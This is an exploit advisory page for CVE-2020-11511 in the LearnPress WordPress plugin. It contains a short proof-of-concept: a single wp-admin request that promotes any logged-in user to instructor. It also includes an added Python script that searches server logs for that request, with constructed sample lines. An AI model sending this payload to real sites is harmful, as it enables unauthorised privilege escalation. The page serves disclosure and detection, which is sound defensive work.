CVE-2020-11511: WordPress LearnPress Privilege Escalation ≈ Packet Storm
The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter.
# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 - User Registration Privilege Escalation
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511

POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!
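
Added example, not part of the original advisory or the exploit author's PoC: a check that scans web server access logs for the request shown above, so that affected sites can identify which user ids were targeted. It assumes Apache/Nginx "combined" log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jul/2021:10:02:11 +0000] "GET /wp-admin/?action=accept-to-be-teacher&user_id=42 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Jul/2021:10:02:15 +0000] "GET /wp-admin/profile.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jul/2021:11:40:03 +0000] "GET /wp-admin/index.php?user_id=7&action=accept-to-be-teacher HTTP/1.1" 200 812 "-" "curl/7.68.0"
198.51.100.9 - - [17/Jul/2021:11:41:00 +0000] "GET /wp-admin/?action=accept%2Dto%2Dbe%2Dteacher&user_id=8 HTTP/1.1" 200 812 "-" "curl/7.68.0"
192.0.2.55 - - [17/Jul/2021:12:00:00 +0000] "GET /courses/?s=accept-to-be-teacher HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
ACTION = "accept-to-be-teacher"  # action value taken from the advisory


def find_teacher_role_requests(log_text):
    """Return one record per wp-admin request carrying the advisory's action."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, when, method, target, status = m.groups()
        url = urlsplit(target)
        if "/wp-admin" not in url.path:
            continue  # the string elsewhere (e.g. a site search) is not the action
        # parse_qs percent-decodes, so encoded variants and any parameter
        # order are matched as well
        params = parse_qs(url.query, keep_blank_values=True)
        if ACTION not in (v.lower() for v in params.get("action", [])):
            continue
        hits.append({
            "ip": ip,
            "time": when,
            "method": method,
            "status": int(status),
            "user_id": params.get("user_id", [""])[0],
        })
    return hits


if __name__ == "__main__":
    for hit in find_teacher_role_requests(SAMPLE_LOG):
        print(hit)
```

On a site that ran LearnPress before 3.2.6.9, each reported user_id is an account whose current role is worth reviewing.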